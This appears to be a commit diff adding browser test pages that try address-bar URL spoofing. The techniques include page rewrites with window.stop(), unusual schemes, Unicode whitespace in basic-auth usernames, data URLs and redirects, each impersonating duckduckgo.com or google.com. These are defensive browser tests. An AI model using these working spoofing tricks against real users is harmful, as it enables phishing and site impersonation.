duckduckgo · kdzwinel · Nov 8, 2023 · Oct 31, 2023 · Oct 31, 2023 · Oct 31, 2023
@@ -0,0 +1,28 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            let win = open("about:blank");
+            win.document.write("<title>DuckDuckGo - Privacy, Simplified.</title>Not DDG.");
+            setTimeout(() => {
+                win.location = "https://duckduckgo.com/";
+                win.window.stop();
+            }, 500);
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test will try to confuse the browser to show the wrong domain in the URL bar by opening an about:blank page,
+    rewriting the content, starting a navigation elsewhere and quickly stopping the
+    navigation using window.stop().
+    <button id="run" onclick="run()">Start</button>
+</body>
+
+</html>
@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Unsupported Application Scheme</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            var t = window.open('filesystem:whatever', 'aa');
+            t.document.body.innerHTML = '<title>DuckDuckGo - Privacy Simplified</title><h1>Not DDG.</h1>';
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses an unsupported application scheme and a href target to trick the browser into displaying the href
+    target as the current address bar value, while actually navigating to an attacker controlled page.
+    <a id="run" href="https://duckduckgo.com:" target="aa" onclick="setTimeout('run()',100)">
+        <h1>Start</h1>
+    </a>
+</body>
+
+</html>
@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Basic Auth Whitespace (2028)</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            location = `https://www.google.com\[email protected]/`
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses a unicode whitespace character (\u2028) inside the username field of the basicauth portion
+    of the URL to perform an address bar spoofing attack.
+    <button id="run" onclick="run()">run</button>
+</body>
+
+</html>
@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Basic Auth Whitespace (2029)</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            location = `https://www.google.com\[email protected]/`
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses a unicode whitespace character (\u2029) inside the username field of the basicauth portion
+    of the URL to perform an address bar spoofing attack.
+    <button id="run" onclick="run()">run</button>
+</body>
+
+</html>
@@ -0,0 +1,24 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Basic Auth Whitespace Repeated</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            var whitespaces = "\u3000".repeat(300);
+            location = `https://www.google.com${whitespaces}@example.com/`;
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses 300 repeated unicode whitespace characters inside the username field of the basicauth portion
+    of the URL to perform an address bar spoofing attack.
+    <button id="run" onclick="run()">run</button>
+</body>
+
+</html>
@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <meta http-equiv="Content-Security-Policy" content="form-action https://duck.co" />
+    <title>URL Spoofing - Redirect Form Action</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            document.forms[0].submit();
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+    This test uses a form action on a redirect URL to trick the browser into displaying the
+    redirect URL as the current address bar value, while trying to remain on the current page.
+    <form action="https://duck.co/">
+    </form>
+</body>
+
+</html>
@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width">
+  <title>URL Spoofing - Download URL</title>
+  <script>
+    // eslint-disable-next-line no-unused-vars
+    function run() {
+      const w = open()
+      w.opener = null
+      w.document.write('<h1>Not Google.</h1>')
+      w.location = 'http://goo.gl/3Hywh'
+    }
+  </script>
+</head>
+
+<body>
+  <p><a href="../index.html">[Home]</a></p>
+  This test uses a Google hosted download URL for downloading a file to spoof the browser into displaying the download
+  URL as the current origin while rewriting the document content to spoof the address bar.
+  <button onclick="run()">Start</button>
+</body>
+
+</html>
@@ -0,0 +1,26 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Simple JS page rewrite</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run () {
+            document.write('Not DDG.<br>');
+            document.location = 'https://duckduckgo.com:8443';
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+
+    This test will try to confuse the browser to show the wrong domain in the URL bar by rewriting the current page
+    content and loading a URL that will timeout.
+
+    <button onclick="run()">Start</button>
+</body>
+
+</html>
@@ -0,0 +1,31 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Base64 Document Load</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            w = open('data:text/html;base64,PHRpdGxlPkR1Y2tEdWNrR28gLSBQcml2YWN5LCBTaW1wbGlmaWVkPC90aXRsZT48aDE+Tm90IERERzwvaDE+Cg==')
+            setTimeout(function () {
+                w.location = 'tel://duckduckgo.com'
+                setTimeout(function () {
+                    w.history.back()
+                }, 2100)
+            }, 2000)
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+
+    This test will try to confuse the browser to show the wrong domain in the URL bar by loading a static Base64
+    encoded document, rewriting the current page, and then navigating to a tel: URL.
+
+    <button onclick="run()">Start</button>
+</body>
+
+</html>
@@ -0,0 +1,24 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - Simple Location</title>
+    <script>
+        // eslint-disable-next-line no-unused-vars
+        function run() {
+            location = "httpx://www.duckduckgo.com";
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="../index.html">[Home]</a></p>
+
+    This is the most simple test for URL spoofing. Simply rewrite the current location using an unsupported scheme.
+
+    <button onclick="run()">Start</button>
+</body>
+
+</html>